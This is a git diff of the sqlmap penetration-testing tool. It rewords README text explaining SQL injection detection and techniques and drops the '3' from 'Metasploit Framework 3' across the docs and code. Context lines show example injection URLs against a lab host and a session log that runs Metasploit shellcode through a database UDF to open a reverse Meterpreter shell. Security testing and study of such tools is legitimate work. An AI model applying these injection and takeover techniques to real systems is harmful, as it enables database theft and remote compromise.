@@ -93,26 +93,23 @@ on the operating system via out-of-band connections.
@@ -138,15 +135,15 @@ for the database management system that you are going to attack:
the sqlmap update functionality (--update switch) you need to
install respectively
python-ntlm and
-python-svn libraries.
-Optionally, if you are running sqlmap on Windows, you may wish to install
+python-svn libraries respectively.
+Optionally, if you are running sqlmap on Windows, you may wish to install the
PyReadline
-library to be able to take advantage of the sqlmap TAB completion and
+library in order to take advantage of the sqlmap TAB completion and
history support features in the SQL shell and OS shell.
-Note that these functionalities are available natively by Python standard
+Note that these functionalities are available natively via the standard Python
readline
library on other operating systems.
-You can also choose to install
+
You can also choose to install the
Psyco library to eventually speed up the sqlmap algorithmic
operations.
@@ -157,13 +154,13 @@ operations.
Detect and exploit a SQL injection
Let's say that you are auditing a web application and found a web page
-that accepts dynamic user-provided values on GET or POST
-parameters or HTTP Cookie values or HTTP User-Agent
-header value.
+that accepts dynamic user-provided values via GET, POST
+or Cookie parameters or via the HTTP User-Agent
+request header.
You now want to test if these are affected by a SQL injection
vulnerability, and if so, exploit them to retrieve as much information as
-possible out of the web application's back-end database management system
-or even be able to access the underlying file system and operating system.
+possible from the back-end database management system, or even be able to
+access the underlying file system and operating system.
In a simple world, consider that the target url is:
@@ -176,57 +173,53 @@ or even be able to access the underlying file system and operating system.
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1
-is the same page as the original one and:
+is the same page as the original one and (the condition evaluates to True):
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2
-differs from the original one, it means that you are in front of a SQL
+
differs from the original one (the condition evaluates to False).
+This likely means that you are in front of a SQL
injection vulnerability in the id GET parameter of the
-index.php web application page which means that potentially no
-IDS/IPS, no web application firewall, no parameters' value sanitization is
-performed on the server-side before sending the SQL statement to the
-back-end database management system the web application relies on.
-This is a quite common flaw in dynamic content web applications and it
+index.php page. Additionally, no sanitisation of user's supplied
+input is taking place before the SQL statement is sent to the
+back-end database management system.
+This is quite a common flaw in dynamic content web applications and it
does not depend upon the back-end database management system nor on the web
-application programming language: it is a programmer code's security flaw.
+application programming language; it is a flaw within the application code.
The
Open Web Application Security Project
-rated on 2010 in their
-OWASP Top Ten survey this vulnerability as the
-most common and important web application vulnerability along with other
-injection flaws.
-Back to the scenario, probably the SQL SELECT statement into
-get_int.php has a syntax similar to the following SQL query, in
-pseudo PHP code:
+rated this class of vulnerability as the
+most common and serious web application vulnerability in their
+Top Ten list from 2010.
+Now that you have found the vulnerable parameter, you can exploit it by
+manipulating the id parameter value in the HTTP request.
+Back to the scenario, we can make an educated guess about the probable
+syntax of the SQL SELECT statement where the user supplied value is
+being used in the get_int.php web page. In pseudo PHP code:
$query = "SELECT [column(s) name] FROM [table name] WHERE id=" . $_REQUEST['id'];
-As you can see, appending any other syntatically valid SQL condition after
-a value for id such condition will take place when the web
-application passes the query to the back-end database management system
-that executes it, that is why the condition id=1 AND 1=1 is valid
-(True) and returns the same page as the original one, with the
-same content. This is the case of a boolean-based blind SQL injection
-vulnerability. However, sqlmap is able to detect any type of SQL injection
-and adapt its work-flow accordingly. Read below for further details.
-Moreover, in this simple and easy to inject scenario it would be also
-possible to append, not just one or more valid SQL condition(s), but also
-stacked SQL queries, for instance something like [...]&id=1;
-ANOTHER SQL QUERY# if the web application technology supports
-stacked queries, also known as multiple statements.
-Now that you found this SQL injection vulnerable parameter, you can
-exploit it by manipulating the id parameter value in the HTTP
-request.
-There exist many
-resources
-on the Net explaining in depth how to prevent, detect and exploit SQL
-injection vulnerabilities in web application and it is recommended to read
-them if you are not familiar with the issue before going ahead with sqlmap.
-Passing the original address, http://192.168.136.131/sqlmap/mysql/get_int.php?id=1
+
As you can see, appending a syntactically valid SQL statement that will
+evaluate to a True condition after the value for the id
+parameter (such as id=1 AND 1=1) will result in the web application
+returning the same web page as in the original request (where no SQL
+statement is added).
+This is because the back-end database management system has evaluated the
+injected SQL statement.
+The previous example describes a simple boolean-based blind SQL injection
+vulnerability.
+However, sqlmap is able to detect any type of SQL injection flaw and adapt
+its work-flow accordingly.
+In this simple scenario it would also be possible to append, not just one or
+more valid SQL conditions, but also (depending on the DBMS) stacked SQL
+queries. For instance: [...]&id=1;ANOTHER SQL QUERY#.
+sqlmap can automate the process of identifying and exploiting this type of
+vulnerability.
+Passing the original address, http://192.168.136.131/sqlmap/mysql/get_int.php?id=1
to sqlmap, the tool will automatically:
@@ -237,7 +230,14 @@ vulnerable parameter(s);
- Depending on the user's options, it will extensively fingerprint,
enumerate data or takeover the database server as a whole.
-
+
+...and depending on supplied options, it will enumerate data or takeover the
+database server entirely.
+There exist many
+resources
+on the web explaining in depth how to detect, exploit and prevent SQL
+injection vulnerabilities in web applications. It is recommendeded that you read
+them before going much further with sqlmap.
Direct connection to the database management system
@@ -280,30 +280,30 @@ For each HTTP response, by making a comparison between the HTTP response
time with the original request, the tool inference the output of
the injected statement character by character. Like for boolean-based
technique, the bisection algorithm is applied.
-- Error-based SQL injection: sqlmap replaces or append to the
-affected parameter a database-specific syntatically wrong statement and
-parses the HTTP response headers and body in search of DBMS error messages
-containing the injected pre-defined chain of characters and the statement
-output within. This technique works when the web application has been
-configured to disclose back-end database management system error messages
-only.
+- Error-based SQL injection: sqlmap replaces or appends to
+the affected parameter a database-specific error message provoking statement
+and parses the HTTP response headers and body in search of DBMS error messages
+containing the injected pre-defined chain of characters and the subquery
+statement output within. This technique works only when the web application
+has been configured to disclose back-end database management system error
+messages.
- UNION query SQL injection, also known as inband SQL
injection: sqlmap appends to the affected parameter a syntatically
-valid SQL statement string starting with a
UNION ALL SELECT.
-This techique works when the web application page passes the output of the
-SELECT statement within a for cycle, or similar, so that
-each line of the query output is printed on the page content.
+valid SQL statement starting with an UNION ALL SELECT.
+This techique works when the web application page passes directly the output
+of the SELECT statement within a for loop, or similar, so
+that each line of the query output is printed on the page content.
sqlmap is also able to exploit partial (single entry) UNION query SQL
injection vulnerabilities which occur when the output of the
-statement is not cycled in a for construct whereas only the first
+statement is not cycled in a for construct, whereas only the first
entry of the query output is displayed.
- Stacked queries SQL injection, also known as multiple
statements SQL injection: sqlmap tests if the web application supports
-stacked queries then, in case it does support, it appends to the affected
+stacked queries and then, in case it does support, it appends to the affected
parameter in the HTTP request, a semi-colon (
;) followed by the
SQL statement to be executed. This technique is useful to run SQL
-statements other than SELECT like, for instance, data
-definition or data manipulation statements possibly leading
+statements other than SELECT, like for instance, data
+definition or data manipulation statements, possibly leading
to file system read and write access and operating system command
execution depending on the underlying back-end database management system
and the session user privileges.
@@ -1008,7 +1008,7 @@ Options:
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process' user privilege escalation
- --msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
+ --msf-path=MSFPATH Local path where Metasploit Framework is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
Windows registry access:
@@ -2764,7 +2764,7 @@ operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
-[hh:mm:35] [INFO] creating Metasploit Framework 3 multi-stage shellcode
+[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
@@ -2779,7 +2779,7 @@ which payload do you want to use?
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
-[hh:mm:43] [INFO] running Metasploit Framework 3 command line interface locally, please wait..
+[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
_
| | o
@@ -2801,7 +2801,7 @@ LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
-[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
+[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11
diff --git a/doc/README.pdf b/doc/README.pdf
index 159589f70..9771870e1 100644
Binary files a/doc/README.pdf and b/doc/README.pdf differ
diff --git a/doc/README.sgml b/doc/README.sgml
index 6172950b7..62edb11ae 100644
--- a/doc/README.sgml
+++ b/doc/README.sgml
@@ -101,7 +101,7 @@ Assume that:
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1
-is the same page as the original one and (the condition evaluates to True):
+is the same page as the original one and (the condition evaluates to True):
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2
@@ -923,7 +923,7 @@ Options:
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process' user privilege escalation
- --msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
+ --msf-path=MSFPATH Local path where Metasploit Framework is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
Windows registry access:
@@ -2854,7 +2854,7 @@ operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
-[hh:mm:35] [INFO] creating Metasploit Framework 3 multi-stage shellcode
+[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
@@ -2869,7 +2869,7 @@ which payload do you want to use?
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
-[hh:mm:43] [INFO] running Metasploit Framework 3 command line interface locally, please wait..
+[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
_
| | o
@@ -2891,7 +2891,7 @@ LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
-[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
+[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11
diff --git a/doc/THANKS b/doc/THANKS
index 1ccf013db..8a3375b74 100644
--- a/doc/THANKS
+++ b/doc/THANKS
@@ -504,7 +504,7 @@ Kazim Bugra Tombul
for reporting a minor bug
Efrain Torres
- for helping me out to improve the Metasploit Framework 3 sqlmap
+ for helping me out to improve the Metasploit Framework sqlmap
auxiliary module and for commiting it on the Metasploit official
subversion repository
for his great Metasploit WMAP Framework
@@ -694,7 +694,7 @@ AthCon Conference team
Slides: http://goo.gl/QMfjO
Metasploit Framework development team
- for their powerful tool Metasploit Framework 3, used by sqlmap, among
+ for their powerful tool Metasploit Framework, used by sqlmap, among
others things, to create the shellcode and establish an out-of-band
connection between sqlmap and the database server
Homepage: http://www.metasploit.com
diff --git a/lib/core/option.py b/lib/core/option.py
index e2d83cb9b..207fee01e 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -608,13 +608,13 @@ def __setMetasploit():
break
if condition:
- debugMsg = "provided Metasploit Framework 3 path "
+ debugMsg = "provided Metasploit Framework path "
debugMsg += "'%s' is valid" % conf.msfPath
logger.debug(debugMsg)
msfEnvPathExists = True
else:
- warnMsg = "the provided Metasploit Framework 3 path "
+ warnMsg = "the provided Metasploit Framework path "
warnMsg += "'%s' is not valid. The cause could " % conf.msfPath
warnMsg += "be that the path does not exists or that one "
warnMsg += "or more of the needed Metasploit executables "
@@ -623,11 +623,11 @@ def __setMetasploit():
logger.warn(warnMsg)
else:
warnMsg = "you did not provide the local path where Metasploit "
- warnMsg += "Framework 3 is installed"
+ warnMsg += "Framework is installed"
logger.warn(warnMsg)
if not msfEnvPathExists:
- warnMsg = "sqlmap is going to look for Metasploit Framework 3 "
+ warnMsg = "sqlmap is going to look for Metasploit Framework "
warnMsg += "installation into the environment paths"
logger.warn(warnMsg)
@@ -647,7 +647,7 @@ def __setMetasploit():
condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfpayload")))
if condition:
- infoMsg = "Metasploit Framework 3 has been found "
+ infoMsg = "Metasploit Framework has been found "
infoMsg += "installed in the '%s' path" % envPath
logger.info(infoMsg)
@@ -657,7 +657,7 @@ def __setMetasploit():
break
if not msfEnvPathExists:
- errMsg = "unable to locate Metasploit Framework 3 installation. "
+ errMsg = "unable to locate Metasploit Framework installation. "
errMsg += "Get it from http://metasploit.com/framework/download/"
raise sqlmapFilePathException, errMsg
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 5d9f44f9e..bb1b03534 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -421,7 +421,7 @@ def cmdLineParser():
help="Database process' user privilege escalation")
takeover.add_option("--msf-path", dest="msfPath",
- help="Local path where Metasploit Framework 3 "
+ help="Local path where Metasploit Framework "
"is installed")
takeover.add_option("--tmp-path", dest="tmpPath",
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index 4bdec6e15..166de2102 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -368,7 +368,7 @@ class Metasploit:
def __runMsfCliSmbrelay(self):
self.__forgeMsfCliCmdForSmbrelay()
- infoMsg = "running Metasploit Framework 3 command line "
+ infoMsg = "running Metasploit Framework command line "
infoMsg += "interface locally, please wait.."
logger.info(infoMsg)
@@ -378,7 +378,7 @@ class Metasploit:
def __runMsfCli(self, exitfunc):
self.__forgeMsfCliCmd(exitfunc)
- infoMsg = "running Metasploit Framework 3 command line "
+ infoMsg = "running Metasploit Framework command line "
infoMsg += "interface locally, please wait.."
logger.info(infoMsg)
@@ -386,14 +386,14 @@ class Metasploit:
self.__msfCliProc = execute(self.__cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def __runMsfShellcodeRemote(self):
- infoMsg = "running Metasploit Framework 3 shellcode "
+ infoMsg = "running Metasploit Framework shellcode "
infoMsg += "remotely via UDF 'sys_bineval', please wait.."
logger.info(infoMsg)
self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval")
def __runMsfShellcodeRemoteViaSexec(self):
- infoMsg = "running Metasploit Framework 3 shellcode remotely "
+ infoMsg = "running Metasploit Framework shellcode remotely "
infoMsg += "via shellcodeexec, please wait.."
logger.info(infoMsg)
@@ -495,7 +495,7 @@ class Metasploit:
return returncode
def createMsfShellcode(self, exitfunc, format, extra, encode):
- infoMsg = "creating Metasploit Framework 3 multi-stage shellcode "
+ infoMsg = "creating Metasploit Framework multi-stage shellcode "
logger.info(infoMsg)
self.__randStr = randomStr(lowercase=True)
@@ -574,7 +574,7 @@ class Metasploit:
if self.connectionStr.startswith("bind"):
func()
- debugMsg = "Metasploit Framework 3 command line interface exited "
+ debugMsg = "Metasploit Framework command line interface exited "
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, func)
logger.debug(debugMsg)
@@ -593,7 +593,7 @@ class Metasploit:
else:
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile)
- debugMsg = "Metasploit Framework 3 console exited with return "
+ debugMsg = "Metasploit Framework console exited with return "
debugMsg += "code %s" % self.__controlMsfCmd(self.__msfCliProc, self.uncPathRequest)
logger.debug(debugMsg)
@@ -603,6 +603,6 @@ class Metasploit:
if self.connectionStr.startswith("bind"):
self.spHeapOverflow()
- debugMsg = "Metasploit Framework 3 command line interface exited "
+ debugMsg = "Metasploit Framework command line interface exited "
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, self.spHeapOverflow)
logger.debug(debugMsg)
diff --git a/sqlmap.conf b/sqlmap.conf
index c0e23d83b..7a6c78ec7 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -471,7 +471,7 @@ osBof = False
# payload to be Meterpreter.
privEsc = False
-# Local path where Metasploit Framework 3 is installed.
+# Local path where Metasploit Framework is installed.
# Valid: file system path
msfPath =
diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py
index 2e91acb1f..98b588d7d 100644
--- a/tamper/unmagicquotes.py
+++ b/tamper/unmagicquotes.py
@@ -22,7 +22,8 @@ def dependencies():
def tamper(payload):
"""
- Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
+ Replaces quote character (') with a multi-byte combo %bf%27 together with
+ generic comment at the end (to make it work)
Example:
* Input: 1' AND 1=1